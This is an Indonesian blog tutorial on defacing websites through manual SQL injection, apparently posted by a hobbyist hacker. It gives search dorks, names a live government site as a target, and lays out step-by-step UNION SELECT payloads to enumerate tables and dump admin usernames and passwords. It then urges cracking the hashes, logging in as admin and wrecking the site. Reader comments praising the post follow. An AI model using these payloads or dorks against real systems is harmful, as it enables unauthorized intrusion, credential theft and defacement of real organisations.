Deface Metode SQL Injection Manual with Dios
Deface Metode SQL Injection Manual with Dios
Assalamualaikum w.r w.bBertemu lagi dengan gua Mr.D4NCO yang Gans :v
Kali ini gua akan memberikan tutorial SQL Injection Manual
Oke.... disimak ya hehe
[Langkah 1]
Bahan - Bahan
1. Internet cuy yakali kaga pake internet
2. Dork :
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
3.Web yg vuln sql injection
*disini saya ada live target :
http://www.setjen.kemendagri.go.id/news_detail.php?id=10
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
target.com/berita.php?id=10'
sehingga muncul pesan error seperti berikut :
Warning: mysql_fetch_assoc()
Warning: mysql_fetch_array()
Warning: mysql_num_rows()
Warning: session_start()
atau yang semacam/serupa dan sebentuk atau seperti di atas
Pertama tama kalian cari web vuln dulu pake dork yang di atas ya ajg kembangin pake otak lu biar dpt yg mantep :v
[Langkah 2]
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
target.com/berita.php?id=-10+order+by+1-- atau
target.com/berita.php?id=-10+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
target.com/berita.php?id=-10+order+by+1--
target.com/berita.php?id=-10+order+by+2--
target.com/berita.php?id=-10+order+by+3--
target.com/berita.php?id=-10+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: target.com/berita.php?id=-10+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi target.com/berita.php?id=-10+order+by+8--
[Langkah 3]
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: target.com/berita.php?id=-10+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: target.com/berita.php?id=-10+union+select+1,2,3,4,version(),6,7,8-- atau
target.com/berita.php?id=-10+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
[Langkah 4]
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
target.com/berita.php?id=-10+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--
seumpama table yang muncul adalah "admin"
😃
[Langkah 5]
untuk menamplikan semua isi dari table tsb adalah
perintahzg group_concat(table_name) >>> dimasukan padaaa angkaak yg keluar tadik
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angkaax terakhir
target.com/berita.php?id=-10+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--
[Langkah 6]
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+informatioan_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir
target.com/berita.php?id=-10+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
target.com/berita.php?id=-10+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--
[Langkah 7]
memunculkan apa yg tadi telah dikeluarkanbdh dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluarfr tadi
perintah +from+(nama tablee berasal) >>> dimasukan setelahgh angka terakhir
Contoh :
target.com/berita.php?id=-10+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalash id,username,password
Contoh-:-
target.com/berita.php?id=-10+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--
[Langkah 8]
tahaaahp terakhir tinggal crack passwordnya (kalo perlu), terus cari admin loginynha >> tebass 3:)
Tebas web nya biar mampus tuh orang wkwk sad :v
Contoh hasil punya gua ;
Keren bang
ReplyDeleteSemangat teruss bang buat berkarya nya di dunia mayaa!
ReplyDelete